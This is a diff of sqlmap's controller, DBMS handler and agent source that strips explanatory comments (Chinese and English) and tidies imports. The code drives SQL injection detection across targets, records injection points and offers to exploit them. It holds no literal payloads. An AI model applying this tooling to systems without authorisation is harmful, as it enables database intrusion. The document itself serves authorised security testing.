        message = "there were multiple injection points, please select "
        message += "the one to use for following injections:\n"

        points = []

-        # 遍历kb.injections中的每一个injection
        for i in xrange(0, len(kb.injections)):
            place = kb.injections[i].place
            parameter = kb.injections[i].parameter
            ptype = kb.injections[i].ptype
            point = (place, parameter, ptype)

-            # 如果point不在points中，则将point添加到points中
            if point not in points:
                points.append(point)
-                # 如果ptype是整数，则将其转换为PAYLOAD.PARAMETER[ptype]
                ptype = PAYLOAD.PARAMETER[ptype] if isinstance(ptype, int) else ptype

-                # 构造提示信息
                message += "[%d] place: %s, parameter: " % (i, place)
                message += "%s, type: %s" % (parameter, ptype)

-                # 如果是第一个injection，则设置为默认
                if i == 0:
                    message += " (default)"

                message += "\n"

-        # 提示用户选择一个injection
        message += "[q] Quit"
        choice = readInput(message, default='0').upper()

-        # 如果用户选择的是一个有效的injection，则将kb.injection设置为kb.injections[index]
        if isDigit(choice) and int(choice) < len(kb.injections) and int(choice) >= 0:
            index = int(choice)
-        # 如果用户选择的是q，则抛出SqlmapUserQuitException异常
        elif choice == 'Q':
            raise SqlmapUserQuitException
-        # 如果用户选择的是一个无效的injection，则抛出SqlmapValueException异常
        else:
            errMsg = "invalid choice"
            raise SqlmapValueException(errMsg)
@ -158,33 +142,24 @@ def _selectInjection():
        kb.injection = kb.injections[index]

 def _formatInjection(inj):
-    # 获取参数类型
    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else inj.place
-    # 格式化数据
    data = "Parameter: %s (%s)\n" % (inj.parameter, paramType)

-    # 遍历inj.data中的每个键值对
    for stype, sdata in inj.data.items():
-        # 获取title、vector、comment、payload
        title = sdata.title
        vector = sdata.vector
        comment = sdata.comment
        payload = agent.adjustLateValues(sdata.payload)
-        # 如果inj.place为CUSTOM_HEADER，则payload取split后的第二个元素
        if inj.place == PLACE.CUSTOM_HEADER:
            payload = payload.split(',', 1)[1]
-        # 如果stype为UNION，则count为payload中逗号的数量加1，title中替换为count，vector中forgeUnionQuery
        if stype == PAYLOAD.TECHNIQUE.UNION:
            count = re.sub(r"(?i)(\(.+\))|(\blimit[^a-z]+)", "", sdata.payload).count(',') + 1
            title = re.sub(r"\d+ to \d+", str(count), title)
            vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
-            # 如果count为1，则title中替换为column
            if count == 1:
                title = title.replace("columns", "column")
-        # 如果comment不为空，则vector拼接comment
        elif comment:
            vector = "%s%s" % (vector, comment)
-        # 格式化数据
        data += "    Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
        data += "    Title: %s\n" % title
        data += "    Payload: %s\n" % urldecode(payload, unsafe="&", spaceplus=(inj.place != PLACE.GET and kb.postSpaceToPlus))
@ -193,137 +168,98 @@ def _formatInjection(inj):
    return data

 def _showInjections():
-    # 如果conf.wizard且kb.wizardMode为True，则将kb.wizardMode置为False
    if conf.wizard and kb.wizardMode:
        kb.wizardMode = False

-    # 如果kb.testQueryCount大于0，则header为sqlmap识别到的注入点数量
    if kb.testQueryCount > 0:
        header = "sqlmap identified the following injection point(s) with "
        header += "a total of %d HTTP(s) requests" % kb.testQueryCount
-    # 否则header为sqlmap从存储的会话中恢复的注入点
    else:
        header = "sqlmap resumed the following injection point(s) from stored session"

-    # 如果conf.api，则使用conf.dumper.string输出url、query、data和kb.injections
    if conf.api:
        conf.dumper.string("", {"url": conf.url, "query": conf.parameters.get(PLACE.GET), "data": conf.parameters.get(PLACE.POST)}, content_type=CONTENT_TYPE.TARGET)
        conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES)
-    # 否则使用conf.dumper.string输出header和格式化后的kb.injections
    else:
        data = "".join(set(_formatInjection(_) for _ in kb.injections)).rstrip("\n")
        conf.dumper.string(header, data)

-    # 如果conf.tamper，则输出警告信息
    if conf.tamper:
        warnMsg = "changes made by tampering scripts are not "
        warnMsg += "included in shown payload content(s)"
        logger.warning(warnMsg)

-    # 如果conf.hpp，则输出警告信息
    if conf.hpp:
        warnMsg = "changes made by HTTP parameter pollution are not "
        warnMsg += "included in shown payload content(s)"
        logger.warning(warnMsg)

 def _randomFillBlankFields(value):
-    # 将retVal赋值为value
    retVal = value

-    # 如果value中存在EMPTY_FORM_FIELDS_REGEX，则询问是否填充空白字段
    if extractRegexResult(EMPTY_FORM_FIELDS_REGEX, value):
        message = "do you want to fill blank fields with random values? [Y/n] "

-        # 如果输入为Y或空，则将retVal中匹配到的字段替换为随机值
        if readInput(message, default='Y', boolean=True):
            for match in re.finditer(EMPTY_FORM_FIELDS_REGEX, retVal):
                item = match.group("result")
-                # 如果item不在IGNORE_PARAMETERS中且不匹配ASP_NET_CONTROL_REGEX，则替换为随机值
                if not any(_ in item for _ in IGNORE_PARAMETERS) and not re.search(ASP_NET_CONTROL_REGEX, item):
                    newValue = randomStr() if not re.search(r"^id|id$", item, re.I) else randomInt()
-                    # 如果item以DEFAULT_GET_POST_DELIMITER结尾，则替换为"%s%s%s" % (item[:-1], newValue, DEFAULT_GET_POST_DELIMITER)
                    if item[-1] == DEFAULT_GET_POST_DELIMITER:
                        retVal = retVal.replace(item, "%s%s%s" % (item[:-1], newValue, DEFAULT_GET_POST_DELIMITER))
-                    # 否则替换为"%s%s" % (item, newValue)
                    else:
                        retVal = retVal.replace(item, "%s%s" % (item, newValue))

    return retVal

 def _saveToHashDB():
-    # 从hashDB中获取kb.injections
    injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True)
-    # 如果injections不是列表，则将其赋值为空列表
    if not isListLike(injections):
        injections = []
-    # 将kb.injections中满足条件的元素添加到injections中
    injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)

    _ = dict()
-    # 遍历injections中的元素
    for injection in injections:
-        # 将injection.place、injection.parameter、injection.ptype作为key
        key = (injection.place, injection.parameter, injection.ptype)
-        # 如果key不在_中，则将injection添加到_中
        if key not in _:
            _[key] = injection
-        # 否则，将injection.data中的元素更新到_中
        else:
            _[key].data.update(injection.data)
-    # 将_中的元素写入hashDB
    hashDBWrite(HASHDB_KEYS.KB_INJECTIONS, list(_.values()), True)

-    # 从hashDB中获取kb.absFilePaths
    _ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True)
-    # 将kb.absFilePaths中的元素添加到_中
    hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, kb.absFilePaths | (_ if isinstance(_, set) else set()), True)

-    # 如果hashDB中没有kb.chars，则将kb.chars写入hashDB
    if not hashDBRetrieve(HASHDB_KEYS.KB_CHARS):
        hashDBWrite(HASHDB_KEYS.KB_CHARS, kb.chars, True)

-    # 如果hashDB中没有kb.dynamicMarkings，则将kb.dynamicMarkings写入hashDB
    if not hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS):
        hashDBWrite(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, kb.dynamicMarkings, True)

 def _saveToResultsFile():
-    # 如果没有设置conf.resultsFP，则返回
    if not conf.resultsFP:
        return

-    # 创建results字典
    results = {}
-    # 获取PAYLOAD.TECHNIQUE中的所有公共成员，并将其转换为字典
    techniques = dict((_[1], _[0]) for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE))

-    # 遍历kb.injections和kb.falsePositives中的元素
    for injection in kb.injections + kb.falsePositives:
-        # 如果injection.place或injection.parameter为None，则跳过
        if injection.place is None or injection.parameter is None:
            continue

-        # 将injection.place、injection.parameter、injection.notes作为key
        key = (injection.place, injection.parameter, ';'.join(injection.notes))
-        # 如果key不在results中，则将key添加到results中
        if key not in results:
            results[key] = []

-        # 将injection.data中的元素添加到results[key]中
        results[key].extend(list(injection.data.keys()))

-    # 尝试将results中的元素写入conf.resultsFP
    try:
        for key, value in results.items():
-            # 获取key中的元素
            place, parameter, notes = key
-            # 将key中的元素转换为字符串，并添加到line中
            line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep)
-            # 将line写入conf.resultsFP
            conf.resultsFP.write(line)

-        # 刷新conf.resultsFP
        conf.resultsFP.flush()
-    # 如果发生IOError，则抛出SqlmapSystemException
    except IOError as ex:
        errMsg = "unable to write to the results file '%s' ('%s'). " % (conf.resultsFile, getSafeExString(ex))
        raise SqlmapSystemException(errMsg)
@ -336,55 +272,43 @@ def start():
    check if they are dynamic and SQL injection affected
    """

-    # 如果设置了conf.hashFile，则调用crackHashFile函数
    if conf.hashFile:
        crackHashFile(conf.hashFile)

-    # 如果设置了conf.direct，则调用initTargetEnv、setupTargetEnv、action函数
    if conf.direct:
        initTargetEnv()
        setupTargetEnv()
        action()
        return True

-    # 如果设置了conf.url且没有设置conf.forms和conf.crawlDepth，则将(conf.url, conf.method, conf.data, conf.cookie, None)添加到kb.targets中
    if conf.url and not any((conf.forms, conf.crawlDepth)):
        kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))

-    # 如果设置了conf.configFile且没有设置kb.targets，则抛出SqlmapSystemException
    if conf.configFile and not kb.targets:
        errMsg = "you did not edit the configuration file properly, set "
        errMsg += "the target URL, list of targets or google dork"
        logger.error(errMsg)
        return False

-    # 如果kb.targets不为空且kb.targets是列表，且kb.targets的长度大于1，则输出信息
    if kb.targets and isListLike(kb.targets) and len(kb.targets) > 1:
        infoMsg = "found a total of %d targets" % len(kb.targets)
        logger.info(infoMsg)

-    # 初始化targetCount为0
    targetCount = 0
-    # 初始化initialHeaders为conf.httpHeaders
    initialHeaders = list(conf.httpHeaders)

-    # 遍历kb.targets中的元素
    for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
-        # 将targetCount加1
        targetCount += 1

        try:
-            # 如果设置了conf.checkInternet，则调用checkInternet函数
            if conf.checkInternet:
                infoMsg = "checking for Internet connection"
                logger.info(infoMsg)

-                # 如果没有检测到Internet连接，则输出警告信息
                if not checkInternet():
                    warnMsg = "[%s] [WARNING] no connection detected" % time.strftime("%X")
                    dataToStdout(warnMsg)

-                    # 尝试检测Internet连接
                    valid = False
                    for _ in xrange(conf.retries):
                        if checkInternet():
@ -394,38 +318,29 @@ def start():
                            dataToStdout('.')
                            time.sleep(5)

-                    # 如果没有检测到Internet连接，则抛出SqlmapConnectionException
                    if not valid:
                        errMsg = "please check your Internet connection and rerun"
                        raise SqlmapConnectionException(errMsg)
                    else:
                        dataToStdout("\n")

-            # 将conf.url赋值为targetUrl
            conf.url = targetUrl
-            # 将conf.method赋值为targetMethod的大写形式
            conf.method = targetMethod.upper().strip() if targetMethod else targetMethod
-            # 将conf.data赋值为targetData
            conf.data = targetData
-            # 将conf.cookie赋值为targetCookie
            conf.cookie = targetCookie
-            # 将conf.httpHeaders赋值为initialHeaders和targetHeaders的并集
            conf.httpHeaders = list(initialHeaders)
            conf.httpHeaders.extend(targetHeaders or [])

-            # 如果设置了conf.randomAgent或conf.mobile，则将initialHeaders中USER_AGENT的值赋值给conf.httpHeaders
            if conf.randomAgent or conf.mobile:
                for header, value in initialHeaders:
                    if header.upper() == HTTP_HEADER.USER_AGENT.upper():
                        conf.httpHeaders.append((header, value))
                        break

-            # 如果设置了conf.data，则将conf.data中的__ ASP(.NET)参数进行URL编码
            if conf.data:
                # Note: explicitly URL encode __ ASP(.NET) parameters (e.g. to avoid problems with Base64 encoded '+' character) - standard procedure in web browsers
                conf.data = re.sub(r"\b(__\w+)=([^&]+)", lambda match: "%s=%s" % (match.group(1), urlencode(match.group(2), safe='%')), conf.data)

-            # 将conf.httpHeaders中重复的header删除
            conf.httpHeaders = [conf.httpHeaders[i] for i in xrange(len(conf.httpHeaders)) if conf.httpHeaders[i][0].upper() not in (__[0].upper() for __ in conf.httpHeaders[i + 1:])]

            initTargetEnv()
@ -433,24 +348,19 @@ def start():

            testSqlInj = False

-            # 如果配置中包含PLACE.GET参数，并且没有conf.data和conf.testParameter参数，则遍历conf.parameters[PLACE.GET]中的参数
            if PLACE.GET in conf.parameters and not any((conf.data, conf.testParameter)):
                for parameter in re.findall(r"([^=]+)=([^%s]+%s?|\Z)" % (re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]):
                    paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0])

-                    # 如果paramKey不在kb.testedParams中，则设置testSqlInj为True
                    if paramKey not in kb.testedParams:
                        testSqlInj = True
                        break
            else:
-                # 否则，设置paramKey为(conf.hostname, conf.path, None, None)，并检查paramKey是否在kb.testedParams中
                paramKey = (conf.hostname, conf.path, None, None)
                if paramKey not in kb.testedParams:
                    testSqlInj = True

-            # 如果testSqlInj为True，并且conf.hostname在kb.vulnHosts中，则检查是否跳过该主机
            if testSqlInj and conf.hostname in kb.vulnHosts:
-                # 如果kb.skipVulnHost为None，则提示用户是否跳过该主机的进一步测试
                if kb.skipVulnHost is None:
                    message = "SQL injection vulnerability has already been detected "
                    message += "against '%s'. Do you want to skip " % conf.hostname
@ -458,16 +368,13 @@ def start():

                    kb.skipVulnHost = readInput(message, default='Y', boolean=True)

-                # 如果kb.skipVulnHost为True，则设置testSqlInj为False
                testSqlInj = not kb.skipVulnHost

-            # 如果testSqlInj为False，则跳过该URL
            if not testSqlInj:
                infoMsg = "skipping '%s'" % targetUrl
                logger.info(infoMsg)
                continue

-            # 如果conf.multipleTargets为True，则提示用户是否测试该表单或URL
            if conf.multipleTargets:
                if conf.forms and conf.method:
                    message = "[%d/%s] Form:\n%s %s" % (targetCount, len(kb.targets) if isListLike(kb.targets) else '?', conf.method, targetUrl)
@ -481,28 +388,23 @@ def start():
                    message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST, urlencode(conf.data or "") if re.search(r"\A\s*[<{]", conf.data or "") is None else conf.data)

                if conf.forms and conf.method:
-                    # 如果conf.method为GET，并且targetUrl中不包含"?"，则跳过
                    if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:
                        continue

                    message += "\ndo you want to test this form? [Y/n/q] "
                    choice = readInput(message, default='Y').upper()

-                    # 如果用户选择"N"，则跳过
                    if choice == 'N':
                        continue
-                    # 如果用户选择"Q"，则退出
                    elif choice == 'Q':
                        break
                    else:
-                        # 如果conf.method不为GET，则编辑POST数据
                        if conf.method != HTTPMETHOD.GET:
                            message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data or "") if re.search(r"\A\s*[<{]", conf.data or "None") is None else conf.data, " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
                            conf.data = readInput(message, default=conf.data)
                            conf.data = _randomFillBlankFields(conf.data)
                            conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data

-                        # 如果conf.method为GET，则编辑GET数据
                        else:
                            if '?' in targetUrl:
                                firstPart, secondPart = targetUrl.split('?', 1)
@ -511,37 +413,29 @@ def start():
                                test = _randomFillBlankFields(test)
                                conf.url = "%s?%s" % (firstPart, test)

-                        # 解析目标URL
                        parseTargetUrl()

                else:
-                    # 如果conf.scope为False，则提示用户是否测试该URL
                    if not conf.scope:
                        message += "\ndo you want to test this URL? [Y/n/q]"
                        choice = readInput(message, default='Y').upper()

-                        # 如果用户选择"N"，则跳过
                        if choice == 'N':
                            dataToStdout(os.linesep)
                            continue
-                        # 如果用户选择"Q"，则退出
                        elif choice == 'Q':
                            break
                    else:
                        pass

-                    # 打印测试URL
                    infoMsg = "testing URL '%s'" % targetUrl
                    logger.info(infoMsg)

-            # 设置目标环境
            setupTargetEnv()

-            # 检查连接
            if not checkConnection(suppressOutput=conf.forms):
                continue

-            # 如果conf.rParam为True，并且kb.originalPage不为空，则更新kb.randomPool
            if conf.rParam and kb.originalPage:
                kb.randomPool = dict([_ for _ in kb.randomPool.items() if isinstance(_[1], list)])

@ -551,16 +445,12 @@ def start():
                    if options:
                        kb.randomPool[name] = options

-            # 检查WAF
            checkWaf()

-            # 如果conf.nullConnection为True，则检查空连接
            if conf.nullConnection:
                checkNullConnection()

-            # 如果kb.injections为空，或者kb.injections中只有一个place为None的元素，或者kb.injection.place为None，或者kb.injection.parameter为None，则进行以下操作
            if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) and (kb.injection.place is None or kb.injection.parameter is None):
-                # 如果conf.string和conf.notString和conf.regexp都为空，并且PAYLOAD.TECHNIQUE.BOOLEAN在conf.technique中，则检查页面稳定性
                if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.technique:
                    # NOTE: this is not needed anymore, leaving only to display
                    # a warning message to the user in case the page is not stable
@ -705,7 +595,6 @@ def start():

                                check = heuristicCheckSqlInjection(place, parameter)

-                                # 如果启发式检查结果不是正数，则跳过
                                if check != HEURISTIC_TEST.POSITIVE:
                                    if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
                                        infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
@ -719,9 +608,7 @@ def start():
                                proceed = not kb.endDetection
                                injectable = False

-                                # 如果注入点存在
                                if getattr(injection, "place", None) is not None:
-                                    # 如果注入点被标记为假阳性或不可利用，则将其添加到假阳性列表中
                                    if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE in injection.notes:
                                        kb.falsePositives.append(injection)
                                    else:
@ -729,7 +616,6 @@ def start():

                                        kb.injections.append(injection)

-                                        # 如果没有发出警报，则发出警报
                                        if not kb.alerted:
                                            if conf.alert:
                                                infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
@ -763,53 +649,37 @@ def start():
                                if place == PLACE.COOKIE:
                                    kb.mergeCookies = popValue()

-            # 如果kb.injections的长度为0，或者长度为1且kb.injections[0].place为None，则执行以下代码
            if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
-                # 如果kb.vainRun为True且conf.multipleTargets为False，则执行以下代码
                if kb.vainRun and not conf.multipleTargets:
-                    # 定义错误信息
                    errMsg = "no parameter(s) found for testing in the provided data "
                    errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')"
-                    # 如果kb.originalPage存在，则执行以下代码
                    if kb.originalPage:
                        advice = []
-                        # 如果conf.forms为False且kb.originalPage中存在<form，则将--forms添加到advice中
                        if not conf.forms and re.search(r"<form", kb.originalPage) is not None:
                            advice.append("--forms")
-                        # 如果conf.crawlDepth为False且kb.originalPage中存在href，则将--crawl=2添加到advice中
                        if not conf.crawlDepth and re.search(r"href=[\"']/?\w", kb.originalPage) is not None:
                            advice.append("--crawl=2")
-                        # 如果advice不为空，则将advice添加到错误信息中
                        if advice:
                            errMsg += ". You are advised to rerun with '%s'" % ' '.join(advice)
-                    # 抛出SqlmapNoneDataException异常，并传递错误信息
                    raise SqlmapNoneDataException(errMsg)
-                # 否则，执行以下代码
                else:
-                    # 定义错误信息
                    errMsg = "all tested parameters do not appear to be injectable."

-                    # 如果conf.level小于5或conf.risk小于3，则将以下信息添加到错误信息中
                    if conf.level < 5 or conf.risk < 3:
                        errMsg += " Try to increase values for '--level'/'--risk' options "
                        errMsg += "if you wish to perform more tests."

-                    # 如果conf.technique为列表且长度小于5，则将以下信息添加到错误信息中
                    if isinstance(conf.technique, list) and len(conf.technique) < 5:
                        errMsg += " Rerun without providing the option '--technique'."

-                    # 如果conf.textOnly为False且kb.originalPage存在，则执行以下代码
                    if not conf.textOnly and kb.originalPage:
-                        # 计算kb.originalPage中文本内容的百分比
                        percent = (100.0 * len(getFilteredPageContent(kb.originalPage)) / len(kb.originalPage))

-                        # 如果kb.dynamicMarkings为True，则将以下信息添加到错误信息中
                        if kb.dynamicMarkings:
                            errMsg += " You can give it a go with the switch '--text-only' "
                            errMsg += "if the target page has a low percentage "
                            errMsg += "of textual content (~%.2f%% of " % percent
                            errMsg += "page content is text)."
-                        # 如果文本内容的百分比小于LOW_TEXT_PERCENT且kb.errorIsNone为False，则将以下信息添加到错误信息中
                        elif percent < LOW_TEXT_PERCENT and not kb.errorIsNone:
                            errMsg += " Please retry with the switch '--text-only' "
                            errMsg += "(along with --technique=BU) as this case "
@ -818,7 +688,6 @@ def start():
                            errMsg += "of comparison engine to detect at least "
                            errMsg += "one dynamic parameter)."

-                    # 如果kb.heuristicTest为HEURISTIC_TEST.POSITIVE，则将以下信息添加到错误信息中
                    if kb.heuristicTest == HEURISTIC_TEST.POSITIVE:
                        errMsg += " As heuristic test turned out positive you are "
                        errMsg += "strongly advised to continue on with the tests."
@ -847,41 +716,29 @@ def start():
                # Flush the flag
                kb.testMode = False

-                # Save the results to a file
                _saveToResultsFile()
-                # Save the results to a hash database
                _saveToHashDB()
-                # Show the injections
                _showInjections()
-                # Select an injection
                _selectInjection()

-            # Check if there is an injection
            if kb.injection.place is not None and kb.injection.parameter is not None:
-                # Check if there are multiple targets
                if conf.multipleTargets:
-                    # Ask the user if they want to exploit the SQL injection
                    message = "do you want to exploit this SQL injection? [Y/n] "
                    condition = readInput(message, default='Y', boolean=True)
                else:
-                    # Set the condition to True
                    condition = True

-                # If the condition is True, execute the action
                if condition:
                    action()

        except KeyboardInterrupt:
-            # 捕获用户中断异常
            if kb.lastCtrlCTime and (time.time() - kb.lastCtrlCTime < 1):
-                # 如果用户在1秒内连续按下了Ctrl+C，则设置kb.multipleCtrlC为True，并抛出SqlmapUserQuitException异常
                kb.multipleCtrlC = True
                raise SqlmapUserQuitException("user aborted (Ctrl+C was pressed multiple times)")

            kb.lastCtrlCTime = time.time()

            if conf.multipleTargets:
-                # 如果在多个目标模式下，用户中断了扫描
                warnMsg = "user aborted in multiple target mode"
                logger.warning(warnMsg)

@ -889,63 +746,49 @@ def start():
                choice = readInput(message, default='Y').upper()

                if choice == 'N':
-                    # 如果用户选择不跳过，则返回False
                    return False
                elif choice == 'Q':
-                    # 如果用户选择退出，则抛出SqlmapUserQuitException异常
                    raise SqlmapUserQuitException
            else:
-                # 如果不在多个目标模式下，则抛出异常
                raise

        except SqlmapSkipTargetException:
-            # 捕获SqlmapSkipTargetException异常，不做任何操作
            pass

        except SqlmapUserQuitException:
-            # 捕获SqlmapUserQuitException异常，抛出异常
            raise

        except SqlmapSilentQuitException:
-            # 捕获SqlmapSilentQuitException异常，抛出异常
            raise

        except SqlmapBaseException as ex:
-            # 捕获SqlmapBaseException异常，获取异常信息
            errMsg = getSafeExString(ex)

            if conf.multipleTargets:
-                # 如果在多个目标模式下，保存结果到文件，并跳过下一个目标
                _saveToResultsFile()

                errMsg += ", skipping to the next target"
                logger.error(errMsg.lstrip(", "))
            else:
-                # 如果不在多个目标模式下，记录错误信息，并返回False
                logger.critical(errMsg)
                return False

        finally:
-            # 显示HTTP错误码
            showHttpErrorCodes()

            if kb.maxConnectionsFlag:
-                # 如果设置了最大连接数，则记录警告信息
                warnMsg = "it appears that the target "
                warnMsg += "has a maximum connections "
                warnMsg += "constraint"
                logger.warning(warnMsg)

    if kb.dataOutputFlag and not conf.multipleTargets:
-        # 如果设置了数据输出，且不在多个目标模式下，则记录信息
        logger.info("fetched data logged to text files under '%s'" % conf.outputPath)

    if conf.multipleTargets:
        if conf.resultsFile:
-            # 如果在多个目标模式下，设置了结果文件，则记录信息
            infoMsg = "you can find results of scanning in multiple targets "
            infoMsg += "mode inside the CSV file '%s'" % conf.resultsFile
            logger.info(infoMsg)

-    # 返回True
    return True
--- a/src/sqlmap-master/lib/controller/handler.py
+++ b/src/sqlmap-master/lib/controller/handler.py
@ -1,20 +1,46 @@
-#!/usr/bin/env python  
-""" 
-Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) 
-See the file 'LICENSE' for copying permission 
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

-# Import necessary modules and classes from the sqlmap project
 from lib.core.common import Backend
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.dicts import DBMS_DICT
 from lib.core.enums import DBMS
 from lib.core.exception import SqlmapConnectionException
-from lib.core.settings import *  # Import all database aliases settings
+from lib.core.settings import ACCESS_ALIASES
+from lib.core.settings import ALTIBASE_ALIASES
+from lib.core.settings import CACHE_ALIASES
+from lib.core.settings import CLICKHOUSE_ALIASES
+from lib.core.settings import CRATEDB_ALIASES
+from lib.core.settings import CUBRID_ALIASES
+from lib.core.settings import DB2_ALIASES
+from lib.core.settings import DERBY_ALIASES
+from lib.core.settings import EXTREMEDB_ALIASES
+from lib.core.settings import FIREBIRD_ALIASES
+from lib.core.settings import FRONTBASE_ALIASES
+from lib.core.settings import H2_ALIASES
+from lib.core.settings import HSQLDB_ALIASES
+from lib.core.settings import INFORMIX_ALIASES
+from lib.core.settings import MAXDB_ALIASES
+from lib.core.settings import MCKOI_ALIASES
+from lib.core.settings import MIMERSQL_ALIASES
+from lib.core.settings import MONETDB_ALIASES
+from lib.core.settings import MSSQL_ALIASES
+from lib.core.settings import MYSQL_ALIASES
+from lib.core.settings import ORACLE_ALIASES
+from lib.core.settings import PGSQL_ALIASES
+from lib.core.settings import PRESTO_ALIASES
+from lib.core.settings import RAIMA_ALIASES
+from lib.core.settings import SQLITE_ALIASES
+from lib.core.settings import SYBASE_ALIASES
+from lib.core.settings import VERTICA_ALIASES
+from lib.core.settings import VIRTUOSO_ALIASES
 from lib.utils.sqlalchemy import SQLAlchemy

-# Import connectors and maps for various DBMS
 from plugins.dbms.access.connector import Connector as AccessConn
 from plugins.dbms.access import AccessMap
 from plugins.dbms.altibase.connector import Connector as AltibaseConn
@ -75,11 +101,9 @@ from plugins.dbms.virtuoso import VirtuosoMap
 def setHandler():
    """
    Detect which is the target web application back-end database
-    management system. This function will handle the identification
-    of the database management system (DBMS) to work with the sqlmap tool.
+    management system.
    """
-    
-    # List of tuples containing DBMS information (DBMS type, aliases, map class, connector class)
+
    items = [
        (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
        (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
@ -111,80 +135,65 @@ def setHandler():
        (DBMS.VIRTUOSO, VIRTUOSO_ALIASES, VirtuosoMap, VirtuosoConn),
    ]

-    # Identify the current DBMS by evaluating conditions
    _ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else () for _ in items)
-
-    # If a DBMS is detected, remove it from the list and place it at the start
    if _:
        items.remove(_)
        items.insert(0, _)

-    # Iterate through the list of DBMS to find the suitable one
    for dbms, aliases, Handler, Connector in items:
-        
-        # If a specific DBMS is forced via configuration
        if conf.forceDbms:
            if conf.forceDbms.lower() not in aliases:
-                continue  # Skip if aliases do not match
+                continue
            else:
-                kb.dbms = conf.dbms = conf.forceDbms = dbms  # Set the forced DBMS
+                kb.dbms = conf.dbms = conf.forceDbms = dbms

-        # Check if the current DBMS is filtered out
        if kb.dbmsFilter:
            if dbms not in kb.dbmsFilter:
-                continue  # Skip if DBMS is in the filter list
-                
-        # Instantiate the handler and connector classes for the DBMS
+                continue
+
        handler = Handler()
        conf.dbmsConnector = Connector()

-        # Direct connection logic if applicable
        if conf.direct:
            exception = None
-            dialect = DBMS_DICT[dbms][3]  # Get the dialect from the dictionary
+            dialect = DBMS_DICT[dbms][3]

-            # Attempt to connect using SQLAlchemy with the provided dialect
            if dialect:
                try:
                    sqlalchemy = SQLAlchemy(dialect=dialect)
-                    sqlalchemy.connect()  # Establish SQLAlchemy connection
-                    
-                    if sqlalchemy.connector:  # If connected successfully
+                    sqlalchemy.connect()
+
+                    if sqlalchemy.connector:
                        conf.dbmsConnector = sqlalchemy
                except Exception as ex:
-                    exception = ex  # Capture any exception that occurs
+                    exception = ex

-            # If no valid dialect or an exception occurred, try direct connection with the DBMS connector
            if not dialect or exception:
                try:
                    conf.dbmsConnector.connect()
                except Exception as ex:
                    if exception:
-                        raise exception  # Raise the previously caught exception
+                        raise exception
                    else:
                        if not isinstance(ex, NameError):
-                            raise  # Raise unexpected exceptions
+                            raise
                        else:
-                            # Raise an exception for unsupported direct connection
                            msg = "support for direct connection to '%s' is not available. " % dbms
                            msg += "Please rerun with '--dependencies'"
                            raise SqlmapConnectionException(msg)

-        # Determine if the current handler should proceed based on DBMS check
        if conf.forceDbms == dbms or handler.checkDbms():
-            # If a specific DBMS resolution is set, assign the corresponding handler
            if kb.resolutionDbms:
-                conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]() 
+                conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]()
                conf.dbmsHandler._dbms = kb.resolutionDbms
            else:
-                # Assign the detected handler and set the DBMS type
                conf.dbmsHandler = handler
                conf.dbmsHandler._dbms = dbms

-            break  # Exit loop after successful DBMS identification
+            break
        else:
-            # Set the DBMS connector to None if the check fails
-            conf.dbmsConnector = None 
+            conf.dbmsConnector = None

-    # At this point, back-end DBMS is correctly fingerprinted, no need to enforce it anymore
-    Backend.flushForcedDbms()
+    # At this point back-end DBMS is correctly fingerprinted, no need
+    # to enforce it anymore
+    Backend.flushForcedDbms()
--- a/src/sqlmap-master/lib/core/agent.py
+++ b/src/sqlmap-master/lib/core/agent.py
@ -66,27 +66,20 @@ class Agent(object):
    """

    def payloadDirect(self, query):
-        # This method replaces the affected parameter with the SQL
-        # injection statement to request
        query = self.cleanupPayload(query)

-        # If the query starts with "AND ", replace it with "SELECT "
        if query.upper().startswith("AND "):
            query = re.sub(r"(?i)AND ", "SELECT ", query, 1)
-        # If the query starts with " UNION ALL ", remove it
